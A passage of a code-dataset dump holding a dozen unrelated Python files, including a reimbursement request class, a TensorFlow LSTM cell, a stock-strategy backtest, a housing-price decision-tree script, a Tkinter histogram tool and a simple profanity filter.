self.budget[n] and s > maxu:\n maxu = sum([self.util_rav[ii]*self.end_rav[ii] for ii in item])\n max_util[n] = maxu\n\n return max_util\n","sub_path":"code/max_util.py","file_name":"max_util.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287157171","text":"class Request:\n def __init__(self, req_id: int, emp_id: int, req_amount: float, req_desc: str,\n req_date: str, approved: bool, mgr_message: str, reviewed: bool):\n self.req_id = req_id\n self.emp_id = emp_id\n self.req_amount = req_amount\n self.req_desc = req_desc\n self.req_date = req_date\n self.approved = approved\n self.mgr_message = mgr_message\n self.reviewed = reviewed\n\n def json(self):\n return {'reqID': self.req_id,\n 'empID': self.emp_id,\n 'reqAmount': self.req_amount,\n 'reqDesc': self.req_desc,\n 'reqDate': self.req_date,\n 'approved': self.approved,\n 'mgrMessage': self.mgr_message,\n 'reviewed': self.reviewed\n }\n\n @staticmethod\n def json_deserialize(json):\n request = Request(0, 0, 0, '', '', False, '', False)\n request.req_id = json['reqID']\n request.emp_id = json['empID']\n request.req_amount = json['reqAmount']\n request.req_desc = json['reqDesc']\n request.req_date = json['reqDate']\n request.approved = json['approved']\n request.mgr_message = json['mgrMessage']\n request.reviewed = json['reviewed']\n return request\n","sub_path":"Project1Backend/entities/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411149573","text":"#!/usr/bin/env python3\n\"\"\"\nCreate a vtu file representing a gaussian distribution in 3D.\n\nAccept a json dictionary with two keys, mean and covariance.\n\n\"\"\"\n\nimport argparse\nimport json\nimport numpy as np\nimport pyevtk\nimport sys\n\nfrom lieroy.parallel import se3_log\nfrom recova.util import parse_dims\n\n\ndef make_ellipsoid_mesh(a,b,c, resolution_u = 10, resolution_v = 10):\n u = np.linspace(0, 2*np.pi, resolution_u, endpoint=True)\n v = np.linspace(0, np.pi, resolution_v, endpoint=True)\n\n U,V = np.meshgrid(u,v, indexing='ij')\n\n X = a * np.cos(U) * np.sin(V)\n Y = b * np.sin(U) * np.sin(V)\n Z = c * np.cos(V)\n\n # Flatten the list of points.\n points = []\n for i in range(resolution_u):\n for j in range(resolution_v):\n point = [X[i,j], Y[i,j], Z[i,j]]\n points.append(point)\n\n # Create the connectivity.\n # Every point is connected to its neighbours on the meshgrid.\n connectivity = []\n offsets = []\n for i in range(resolution_u - 1):\n for j in range(resolution_v - 1):\n point_id = i*resolution_v + j\n\n element_to_add = [point_id, point_id + resolution_v, point_id + resolution_v + 1, point_id + 1]\n connectivity.extend(element_to_add)\n\n if not offsets:\n offsets = [len(element_to_add)]\n else:\n offsets.append(offsets[-1] + len(element_to_add))\n\n return np.array(points), np.array(connectivity), np.array(offsets)\n\n\ndef save_evtk_unstructured_grid(filename, points, connectivity, offsets):\n cell_types = np.array([pyevtk.vtk.VtkQuad.tid] * len(offsets))\n pyevtk.hl.unstructuredGridToVTK(filename,\n np.ascontiguousarray(points[:,0]),\n np.ascontiguousarray(points[:,1]),\n np.ascontiguousarray(points[:,2]),\n np.ascontiguousarray(connectivity),\n np.ascontiguousarray(offsets),\n np.ascontiguousarray(cell_types))\n\n\ndef apply_t_to_points(points, T):\n homogeneous_points = np.ones((4,len(points)))\n homogeneous_points[0:3,:] = 
points.T\n\n transformed_points = np.dot(T, homogeneous_points)\n\n return transformed_points[0:3, :].T\n\n\ndef distribution_to_vtk_ellipsoid(mean, covariance, filename):\n eig_vals, eig_vecs = np.linalg.eig(covariance)\n\n T = np.identity(4)\n T[0:3,0:3] = eig_vecs\n T[0:3,3] = mean\n\n # Replace negative eigenvalues by a very small number.\n for i in range(len(eig_vals)):\n if eig_vals[i] < 0.0:\n eig_vals[i] = 1e-6\n\n points, connectivity, offsets = make_ellipsoid_mesh(*np.sqrt(eig_vals))\n\n points_transformed = apply_t_to_points(points, T)\n\n save_evtk_unstructured_grid(filename, points_transformed, connectivity, offsets)\n\ndef cli():\n parser = argparse.ArgumentParser()\n parser.add_argument('output', type=str, help='The name of the file where to export the plot')\n parser.add_argument('--dims', type=str, default='0,1,2', help='Comma separated list of the dimensions to extract from the covariance matrix')\n parser.add_argument('--center-around-gt', action='store_true')\n args = parser.parse_args()\n\n input_dict = json.load(sys.stdin)\n\n if args.center_around_gt:\n mean = np.identity(4)\n else:\n mean = np.array(input_dict['mean'])\n\n covariance = np.array(input_dict['covariance'])\n\n mean_lie = se3_log(mean)\n\n dims = parse_dims(args.dims)\n\n # Extract the appropriate dims from the covariance matrix.\n covariance = covariance[dims][:,dims]\n\n distribution_to_vtk_ellipsoid(mean_lie[dims], covariance, args.output)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"recova/distribution_to_vtk_ellipsoid.py","file_name":"distribution_to_vtk_ellipsoid.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204767806","text":"#from tensorflow.contrib.rnn.python.ops import core_rnn_cell as rnn_cell\nimport numpy as np\nimport tensorflow as tf\n#from tensorflow.contrib.rnn.python.ops.core_rnn_cell_impl import * # tf == 1.1\nfrom tensorflow.python.ops.rnn_cell_impl import * # tf >= 1.2\nimport core.models.wikiP2D.coref.util as coref_util\n\n\n\nclass SharingWrapper(RNNCell):\n def __init__(self, cell):\n self._cell = cell\n self.my_scope = None\n\n @property\n def state_size(self):\n return self._cell.state_size\n\n @property\n def output_size(self):\n return self._cell.output_size\n\n def __call__(self, inputs, state, _scope=None):\n # _scope is not used (Hold the scope where it was called first.)\n if self.my_scope == None:\n self.my_scope = tf.get_variable_scope() \n else:\n self.my_scope.reuse_variables()\n return self._cell(inputs, state, self.my_scope)\n\n# (from e2e-coref)\nclass CustomLSTMCell(tf.contrib.rnn.RNNCell):\n def __init__(self, num_units, dropout, reuse=None, scope=None):\n self._num_units = num_units\n self._dropout = dropout\n self._reuse = reuse\n\n with tf.variable_scope(scope or type(self).__name__, reuse=reuse):\n self._initializer = self._block_orthonormal_initializer([self.output_size] * 3)\n self.initial_cell_state = tf.get_variable(\"lstm_initial_cell_state\", [1, self.output_size])\n self.initial_hidden_state = tf.get_variable(\"lstm_initial_hidden_state\", [1, self.output_size])\n #self._initial_state = tf.contrib.rnn.LSTMStateTuple(initial_cell_state, initial_hidden_state)\n\n @property\n def state_size(self):\n return tf.contrib.rnn.LSTMStateTuple(self.output_size, self.output_size)\n\n @property\n def output_size(self):\n return self._num_units\n\n #@property\n def initial_state(self, batch_size):\n initial_cell_state = tf.tile(self.initial_cell_state, 
[batch_size, 1])\n    initial_hidden_state = tf.tile(self.initial_hidden_state, [batch_size, 1])\n    return tf.contrib.rnn.LSTMStateTuple(initial_cell_state, initial_hidden_state)\n    #return self._initial_state\n\n  #def preprocess_input(self, inputs):\n  #  return coref_util.projection(inputs, 3 * self.output_size)\n\n  def __call__(self, inputs, state, scope=None):\n    \"\"\"Long short-term memory cell (LSTM).\"\"\"\n    with tf.variable_scope(scope or type(self).__name__, reuse=self._reuse): # \"CustomLSTMCell\"\n      with tf.variable_scope('preprocess'):\n        inputs = coref_util.projection(inputs, 3 * self.output_size)\n      c, h = state\n      #h *= self._dropout_mask\n      h = tf.nn.dropout(h, self._dropout)\n      with tf.variable_scope('projection'):\n        projected_h = coref_util.projection(h, 3 * self.output_size, \n                                            initializer=self._initializer)\n      concat = inputs + projected_h\n      i, j, o = tf.split(concat, num_or_size_splits=3, axis=1)\n      i = tf.sigmoid(i)\n      new_c = (1 - i) * c + i * tf.tanh(j)\n      new_h = tf.tanh(new_c) * tf.sigmoid(o)\n      new_state = tf.contrib.rnn.LSTMStateTuple(new_c, new_h)\n      return new_h, new_state\n\n  def _orthonormal_initializer(self, scale=1.0):\n    def _initializer(shape, dtype=tf.float32, partition_info=None):\n      M1 = np.random.randn(shape[0], shape[0]).astype(np.float32)\n      M2 = np.random.randn(shape[1], shape[1]).astype(np.float32)\n      Q1, R1 = np.linalg.qr(M1)\n      Q2, R2 = np.linalg.qr(M2)\n      Q1 = Q1 * np.sign(np.diag(R1))\n      Q2 = Q2 * np.sign(np.diag(R2))\n      n_min = min(shape[0], shape[1])\n      params = np.dot(Q1[:, :n_min], Q2[:n_min, :]) * scale\n      return params\n    return _initializer\n\n  def _block_orthonormal_initializer(self, output_sizes):\n    def _initializer(shape, dtype=np.float32, partition_info=None):\n      assert len(shape) == 2\n      assert sum(output_sizes) == shape[1]\n      initializer = self._orthonormal_initializer()\n      params = np.concatenate([initializer([shape[0], o], dtype, partition_info) for o in output_sizes], 1)\n      return params\n    return _initializer\n","sub_path":"core/seq2seq/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":3961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"332546536","text":"import bs4 as bs\nimport urllib.request\n\nclass Perk:\n    icon = ''\n    name = ''\n    maxRank = ''\n\n\n# urllib.urlopen() is Python 2 only; use urllib.request.urlopen() for Python 3.\nsource = urllib.request.urlopen('http://runescape.wikia.com/wiki/Perks').read()\n\nsoup = bs.BeautifulSoup(source, 'lxml')\n\ntables = soup.find_all('table', class_='wikitable')\n\nperkTable = tables[1]\n\nperkRows = perkTable.find_all('tr')\n\nfor row in perkRows:\n    perkColumns = row.find_all('td')\n\n    if len(perkColumns) != 0:\n        perk = Perk()\n        perk.icon = perkColumns[0].img['src']\n        perk.name = perkColumns[1].text.strip()\n        perk.maxRank = perkColumns[2].text.strip()\n\n        print(perk.name, perk.maxRank)","sub_path":"Python/Runescape/perksTable.py","file_name":"perksTable.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613820809","text":"\n# ######################################################################################################################\n\"\"\"\nPerformance backtest V0:\n    Portfolio and index returns are computed from actual share holdings; the portfolio and the index buy the same quantities.\n    A fixed amount is invested in each stock, and positions are not rebalanced.\n\"\"\"\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport rqdatac as rq\nfrom rqdatac import *\n\nrq.init()\n\n# Parameters\ninputPath = \"E:/中泰证券/策略/潜伏业绩预增策略/结果/\"\noutputPath = \"E:/中泰证券/策略/潜伏业绩预增策略/权重无调整/\"\nif not os.path.exists(outputPath):\n    os.makedirs(outputPath)\n    print(outputPath + 
'创建成功')\n\nstart_date = '2010-01-01'\nend_date = '2019-10-31'\n\nunit_amount = 5e5\ntax_cost = 0.001\ntran_cost = 0.0015\nindex_code = '000905.XSHG'\n\n\ndef getEveryDay(begin_date,end_date):\n    # Inclusive of both endpoints\n    date_list = []\n    begin_date = datetime.datetime.strptime(begin_date, \"%Y-%m-%d\")\n    end_date = datetime.datetime.strptime(end_date, \"%Y-%m-%d\")\n    while begin_date <= end_date:\n        date_str = begin_date.strftime(\"%Y-%m-%d\")\n        date_list.append(date_str)\n        begin_date += datetime.timedelta(days=1)\n    return date_list\n\n\n# List of trading dates\nlist_trading = get_trading_dates(start_date=start_date, end_date=end_date)\nlist_date = getEveryDay(start_date, end_date)\n\n# Load data\ndf_buy_sell = pd.read_csv(inputPath + \"汇总个股买卖时点.csv\", index_col=0, engine='python')\ndf_buy_sell.sort_values(by='buy_date', axis=0, ascending=True, inplace=True)\ndf_buy_sell = df_buy_sell.reset_index(drop=True)\n\n# Exclude suspended stocks and stocks that open at the limit up/down price on the entry date\nlist_suspended_index = pd.DataFrame(index=df_buy_sell.index, columns=['index'])\nfor ind in df_buy_sell.index:\n    ind_code = df_buy_sell.loc[ind, 'code']\n    ind_date = df_buy_sell.loc[ind, 'buy_date']\n    try:\n        suspended_index = rq.is_suspended(ind_code, start_date=ind_date, end_date=ind_date)\n    except:\n        list_suspended_index.loc[ind, 'index'] = True\n    else:\n        if suspended_index is None:\n            list_suspended_index.loc[ind, 'index'] = True\n        else:\n            list_suspended_index.loc[ind, 'index'] = suspended_index.loc[ind_date, ind_code]\n\nlist_limit_index = pd.DataFrame(index=df_buy_sell.index, columns=['index'])\nfor ind in df_buy_sell.index:\n    ind_code = df_buy_sell.loc[ind, 'code']\n    ind_date = df_buy_sell.loc[ind, 'buy_date']\n\n    stocks_price = rq.get_price(ind_code, start_date=ind_date, end_date=ind_date, frequency='1d',\n                                fields=['open', 'limit_up', 'limit_down'], adjust_type='pre',\n                                skip_suspended=False, market='cn')\n\n    if stocks_price is not None:\n        if stocks_price.loc[ind_date, 'open'] == stocks_price.loc[ind_date, 'limit_up'] or \\\n                stocks_price.loc[ind_date, 'open'] == stocks_price.loc[ind_date, 'limit_down']:\n            list_limit_index.loc[ind, 'index'] = True\n        else:\n            list_limit_index.loc[ind, 'index'] = False\n    else:\n        list_limit_index.loc[ind, 'index'] = True\n\nlist_filter_index = list_suspended_index + list_limit_index\nstocks_list = list_filter_index[list_filter_index.values == False].index.tolist()\ndf_buy_sell = df_buy_sell.loc[stocks_list]\n\n# Stock list\nlist_code = df_buy_sell['code'].unique()\nlist_code.sort()\n\n# Fetch price data\nprice_df = get_price(list_code, start_date=start_date, end_date=end_date, frequency='1d',\n                     fields=['open'], adjust_type='pre', skip_suspended=False, market='cn')\nprice_df = price_df.loc[:, list_code]\nprice_index = get_price(index_code, start_date=start_date, end_date=end_date, frequency='1d',\n                        fields=['open'], adjust_type='pre', skip_suspended=False, market='cn')\n\n# Return calculation\ncash_port = 0\ncash_index = 0\nyear_pre = '2009'\nholding_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\namount_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\nindex_pre = pd.Series(data=np.zeros(len(list_code)), index=list_code)\nratio_df = pd.DataFrame(index=list_date, columns=['daily_ratio', 'index_ratio', 'daily_profit', 'index_profit',\n                                                  'holding_num', 'buy_num', 'sell_num', 'cash_port'])\n\nfor date_str in list_date:\n    date_datetime = datetime.datetime.strptime(date_str, \"%Y-%m-%d\")\n    date = datetime.date(date_datetime.year, date_datetime.month, date_datetime.day)\n    year_str = date_str[:4]\n\n    if date not in list_trading[:-1]:\n        if year_str == year_pre:\n            holding_daily = 
holding_pre.copy()\n            profit_daily = 0\n            profit_index = 0\n        else:\n            holding_daily = pd.Series(data=np.zeros(len(list_code)), index=list_code)\n            profit_daily = 0\n            profit_index = 0\n    else:\n        date_post = list_trading[list_trading.index(date) + 1]\n\n        holding_df = df_buy_sell[(df_buy_sell['buy_date'] <= date_str) & (df_buy_sell['sell_date'] > date_str)]\n        holding_code = holding_df['code'].tolist()\n        holding_daily = pd.Series(data=np.zeros(len(list_code)), index=list_code)\n        holding_daily[holding_code] = 1\n\n        # Daily returns\n        rate_open_to_open = price_df.loc[date_post] / price_df.loc[date] - 1\n        rate_index = price_index.loc[date_post] / price_index.loc[date] - 1\n        rate_open_to_open = rate_open_to_open.fillna(0)\n\n        # Trading signals\n        series_buy = holding_daily - holding_pre\n        series_buy[series_buy < 0] = 0\n        series_sell = holding_daily - holding_pre\n        series_sell[series_sell > 0] = 0\n\n        # Portfolio equity for the day\n        cost_buy = series_buy * tran_cost * unit_amount\n        cost_sell = -(series_sell * (tran_cost + tax_cost) * amount_pre)\n\n        amount_pre[series_buy == 1] = unit_amount\n        amount_daily = amount_pre * rate_open_to_open + amount_pre\n        amount_daily = amount_daily - cost_buy - cost_sell\n        amount_daily[series_sell == -1] = 0\n\n        profit_daily = amount_pre * rate_open_to_open\n        profit_daily[series_sell == -1] = 0\n        profit_daily = profit_daily - cost_buy - cost_sell\n\n        # Index equity for the day\n        cost_buy_index = series_buy * tran_cost * unit_amount\n        cost_sell_index = -series_sell * (tran_cost + tax_cost) * index_pre\n\n        index_pre[series_buy == 1] = unit_amount\n        index_daily = index_pre * rate_index + index_pre\n        index_daily = index_daily - cost_buy_index - cost_sell_index\n        index_daily[series_sell == -1] = 0\n\n        profit_index = index_pre * rate_index\n        profit_index[series_sell == -1] = 0\n        profit_index = profit_index - cost_buy_index - cost_sell_index\n\n        amount_pre = amount_daily.copy()\n        index_pre = index_daily.copy()\n\n        if any(np.isnan(amount_daily)):\n            print(date)\n            break\n\n        # Capital in use\n        if year_str == year_pre:\n            cash_port = np.nansum(holding_daily) * unit_amount\n        else:\n            cash_port = 0\n\n        # Compute metrics\n        ratio_df.loc[date_str, 'holding_num'] = np.nansum(holding_daily)\n        ratio_df.loc[date_str, 'buy_num'] = ((holding_daily != 0) & (holding_pre == 0)).sum()\n        ratio_df.loc[date_str, 'sell_num'] = ((holding_daily == 0) & (holding_pre != 0)).sum()\n        ratio_df.loc[date_str, 'daily_profit'] = np.nansum(profit_daily)\n        ratio_df.loc[date_str, 'index_profit'] = np.nansum(profit_index)\n        ratio_df.loc[date_str, 'cash_port'] = cash_port\n\n    holding_pre = holding_daily.copy()\n    year_pre = year_str\n\n# Return calculation\nyear_index = [date_str[:4] for date_str in list_date]\nratio_df['year_index'] = year_index\n\nunique_year_index = list(set(year_index))\nunique_year_index.sort()\n\nfor year_ind in unique_year_index:\n    ratio_df['daily_ratio'][ratio_df['year_index'] == year_ind] = \\\n        ratio_df['daily_profit'][ratio_df['year_index'] == year_ind] / \\\n        sum(ratio_df['cash_port'][ratio_df['year_index'] == year_ind]) * 365\n\n    ratio_df['index_ratio'][ratio_df['year_index'] == year_ind] = \\\n        ratio_df['index_profit'][ratio_df['year_index'] == year_ind] / \\\n        sum(ratio_df['cash_port'][ratio_df['year_index'] == year_ind]) * 365\n\n# Equity calculation\nequity_df = pd.DataFrame(index=list_date, columns=['daily_equity', 'index_equity', 'excess_equity',\n                                                   'cum_profit', 'index_cum_profit', 'excess_profit'])\n\nequity_df.loc[:, 'daily_equity'] = (ratio_df.loc[:, 'daily_ratio'] + 1).cumprod()\nequity_df.loc[:, 'index_equity'] = (ratio_df.loc[:, 'index_ratio'] + 1).cumprod()\nequity_df.loc[:, 
'excess_equity'] = (ratio_df.loc[:, 'daily_ratio'] - ratio_df.loc[:, 'index_ratio'] + 1).cumprod()\nequity_df.loc[:, 'cum_profit'] = ratio_df.loc[:, 'daily_profit'].cumsum()\nequity_df.loc[:, 'index_cum_profit'] = ratio_df.loc[:, 'index_profit'].cumsum()\nequity_df.loc[:, 'excess_profit'] = (ratio_df.loc[:, 'daily_profit'] - ratio_df.loc[:, 'index_profit']).cumsum()\n\n# Export results\nratio_df.to_csv(outputPath + \"策略收益率换手率.csv\")\nequity_df.to_csv(outputPath + \"策略动态权益.csv\")\n\n# ######################################################################################################################\n","sub_path":"code/back_trading_amount_v0.py","file_name":"back_trading_amount_v0.py","file_ext":"py","file_size_in_byte":9182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"250533187","text":"import csv\n\nimport io\n\nfrom rest_framework.reverse import reverse\n\nfrom data_lake.test.test_hawk import hawk_auth_sender\n\nfrom django.test import (\n    TestCase,\n    override_settings,\n)\n\nfrom rest_framework.test import APIClient\n\n\nclass DataLakeTesting(TestCase):\n    @override_settings(\n        HAWK_INCOMING_ACCESS_KEY=\"some-id\", HAWK_INCOMING_SECRET_KEY=\"some-secret\",\n    )\n    def get_data(self):\n        test_url = f\"http://testserver{reverse(self.url_name)}\"\n\n        sender = hawk_auth_sender(url=test_url)\n        return APIClient().get(\n            test_url,\n            content_type=\"\",\n            HTTP_AUTHORIZATION=sender.request_header,\n            HTTP_X_FORWARDED_FOR=\"1.2.3.4, 123.123.123.123\",\n        )\n\n    def check_data(self):\n        response = self.get_data()\n        assert response[\"Content-Type\"] == \"text/csv\"\n        content = response.content.decode(\"utf-8\")\n        data = csv.reader(io.StringIO(content))\n        rows = list(data)\n        assert len(rows[0]) == self.row_lenght\n        current_row = rows[1]\n        archive_row = rows[2]\n        assert str(current_row[self.code_position]) == str(self.current_code)\n\n        # Check the archived value\n        assert str(archive_row[self.code_position]) == str(self.archived_code)\n","sub_path":"data_lake/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393356089","text":"class Solution(object):\n    def distributeCandies(self, candies):\n        \"\"\"\n        :type candies: List[int]\n        :rtype: int\n        \"\"\"\n        unique = len(set(candies))\n        # Integer division so the result is an int, as documented above.\n        half_len = len(candies) // 2\n        \n        if unique <= half_len:\n            return unique\n        \n        else:\n            return half_len\n        \n    ","sub_path":"Python/Easy/575DistributeCandies.py","file_name":"575DistributeCandies.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"165672758","text":"#Iowa housing price prediction using decision trees\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error\n\n#Generating a dataframe of the Iowa dataset obtained from the government\niowa_file_path = '../input/train.csv'\niowa_training_data = pd.read_csv(iowa_file_path)\nprint(iowa_training_data.columns)\nprint(\"\\n\")\n\n#Defining the label/target variable\ny = iowa_training_data.SalePrice\nprint(y.head(5))\nprint(\"\\n\")\n\n#Defining the features/predictors\niowa_predictors = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\nx = 
iowa_training_data[iowa_predictors]\nprint(x.describe())\nprint(\"\\n\")\n\n#Defining the prediction model and fitting the model on the training dataset\ntrain_x, val_x, train_y, val_y = train_test_split(x, y, random_state = 0)\niowa_model = DecisionTreeRegressor()\niowa_model.fit(train_x, train_y)\n\n#Initiating the prediction function for forecasting prices for the validation dataset comprising information on Iowa's housing\nprint(\"Making predictions for houses in Iowa, on their prices:\")\nprint(val_x)\nprint(\"The values are:\")\nval_predictions = iowa_model.predict(val_x)\nprint(val_predictions)\nprint(\"\\n\")\n\n#Calculating the mean absolute error\nprint(\"The mean absolute error is:\", mean_absolute_error(val_y, val_predictions))\n\n#Utility function for evaluating the model and finding the maximum leaf nodes the model must have to attain the least MAE (mean absolute error)\ndef get_mae(max_leaf_nodes, trainX, valX, trainY, valY):\n model = DecisionTreeRegressor(max_leaf_nodes = max_leaf_nodes, random_state = 0)\n model.fit(trainX, trainY)\n pred_val = model.predict(valX)\n mae = mean_absolute_error(valY, pred_val)\n return(mae)\n\n#Comparing the models with differing values of maximum leaf nodes, by calling the utility function\nfor max_leaf_nodes in [5, 50, 500, 5000]:\n mae_obtained = get_mae(max_leaf_nodes, train_x, val_x, train_y, val_y)\n print(\"Max Leaf Nodes: %d \\t\\t Mean Absolute Error: %d\" %(max_leaf_nodes, mae_obtained))\n \n#Observation: With 50 leaf nodes, the mean absolute error is the least with the value 27825!\"\n#--------------------------------------------------------------------------------------------------\n#Using the Random Forest Model to predict the housing prices in Iowa\n\n#forest_model = RandomForestRegressor()\n#forest_model.fit(train_x, train_y)\n#iowa_predictions = forest_model.predict(val_x)\n#print(mean_absolute_error(val_y, iowa_predictions))\n \n#Observation: Random forest model gives a lower mean absolute error of ~24200, than the decision tree model","sub_path":"Predictive Analysis Of Housing Price Trends In Iowa (USA) Using Decision Trees.py","file_name":"Predictive Analysis Of Housing Price Trends In Iowa (USA) Using Decision Trees.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"544652072","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tkinter as tk \nfrom PIL import ImageTk,Image, ImageDraw\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nfrom os.path import splitext\nimport numpy as np \n\ngui = tk.Tk()\n\ngui.title('AIP 60847047S')\ngui.geometry('1024x640')\n\n\ndef Input(): \n global PILFile\n filename = askopenfilename()\n t1 = splitext(filename)[-1]\n t2 = t1[1:]\n if t2 in {'jpg','BMP','ppm'}:\n PILFile = Image.open(filename).convert('F')\n width, height = PILFile.size\n lb.config(text = \"讀入 \"+ str(width) + \"X\" + str(height) + \" \" + t2 + \" 檔\")\n PILFile = PILFile.resize((390, 480), Image.ANTIALIAS) \n create_img(PILFile)\n \n else:\n lb.config(text = \"不支援的檔案格式\")\n \n\ndef create_img(PILFile):\n global pilfile, qq\n pilfile = ImageTk.PhotoImage(PILFile)\n qq.configure(image = pilfile)\n \n \ndef hist(PILFile):\n global _Image, qaq, avatar\n im_array = np.array(PILFile)\n m_array = np.ndarray.flatten(im_array)\n m_array = np.round(m_array)\n uniqueValues, occurCount = np.unique(m_array, return_counts=True)\n\n width = 400\n height = 400\n avatar = Image.new(\"RGB\", (width, 
height), (255,255,255))\n    drawAvatar = ImageDraw.Draw(avatar)\n\n    for i, j in zip(uniqueValues, occurCount):\n        j = round(j*400/max(occurCount))\n        drawAvatar.rectangle([(0, i),(j, i)], fill = 'Blue')\n    del drawAvatar\n    avatar = avatar.rotate(90)\n    _Image = ImageTk.PhotoImage(avatar)\n    qaq.configure(image = _Image)\n\n    \ndef save(img):\n    filename = asksaveasfilename(title = \"Select file\",filetypes = ([(\"PNG\", \"*.png\"),(\"JPEG\", \"*.jpg\"),(\"BMP\", \"*.BMP\"),(\"PPM\", \"*.ppm\"),(\"All files\", \"*\")]), defaultextension = \"*.*\")\n    print(filename)\n    if filename:\n        img.save(filename)\n    \nframe1 = tk.Frame(gui, width= 450, height= 580)\nqq = tk.Label(frame1)\nqq.pack()\nframe2 = tk.Frame(gui, width= 400, height = 400)\nqaq = tk.Label(frame2)\nqaq.pack()\nframe1.place(x = 0, y = 100)\nframe2.place(x = 670, y = 180)\n\n\n\nlb = tk.Label(gui, text = '', font = 30)\nlb.place(x = 450, y = 50)\nbtn1 = tk.Button(gui, text = \"讀入檔案\", command = Input, font = 80, height = 3, width = 8)\nbtn1.place(x = 0, y = 0)\nbtn2 = tk.Button(gui, text = \"儲存直方圖\", command = lambda : save(avatar), font = 80, height = 3, width = 10)\nbtn2.place(x = 164, y = 0) \nl1 = tk.Label(gui, text = '輸入影像', width = 10,height = 3, font = 30).place(x = 180, y = 600)\nl2 = tk.Label(gui, text = '輸出影像', width = 10,height = 3, font = 30).place(x = 780, y = 600)\nbtn3 = tk.Button(gui, text = \"做直方圖\", command = lambda : hist(PILFile), font = 80, height = 3, width = 8)\nbtn3.place(x = 82, y = 0)\n\ngui.mainloop()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"HW2/HW2 60847047S.py","file_name":"HW2 60847047S.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269769472","text":"\"\"\" Crawley configuration file \"\"\"\n\n# Paths\n\nCRAWLEY_ROOT_DIR = \"crawley\"\n\n# Requests\n\nREQUEST_TIMEOUT = None #in seconds\nREQUEST_DELAY = 300 #in milliseconds\nREQUEST_DEVIATION = 300 #in milliseconds\n\nMOZILLA_USER_AGENT = \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30\"\n\n# Scrapers\n\nSIMILARITY_RATIO = 0.35\n\n","sub_path":"crawley/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572043752","text":"class NaiveFilter():\n\n    def __init__(self): \n        \n        self.keywords = set([])\n\n\n    def parse(self, path):\n\n        for keyword in open(path, 'rb'):\n            self.keywords.add(keyword.strip().decode('utf-8').lower())\n\n    def filter(self, message, repl=\"*\"):\n        \n        message = str(message).lower()\n        for kw in self.keywords:\n            message = message.replace(kw, repl)\n        return message\n\nif __name__ == \"__main__\":\n    f = NaiveFilter()\n    f.parse(\"keywords\")\n\n    print (f.filter(\"弘扬正能量,从在宿舍说文明话坐起\"))\n    # Output: 弘扬正能量,从在宿舍说文明话坐起\n    print (f.filter(\"我他妈的\"))\n    # 我*\n    print (f.filter(\"我日\"))\n    # *\n\n\n","sub_path":"Week1/Answer-xyn.py","file_name":"Answer-xyn.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448377678","text":"import numpy as np\n\n\npoint_indices = box_np_ops.nuscenes_points_in_rbbox(points, rbbox_lidar,annos['rotation_matrix'])\ngt_points = points[point_indices[:, i]]\n\n\n\ndef corner_to_surfaces_3d(corners):\n    \"\"\"convert 3d box corners from corner function above\n    to surfaces that normal vectors all direct to internal.\n\n    Args:\n        corners 
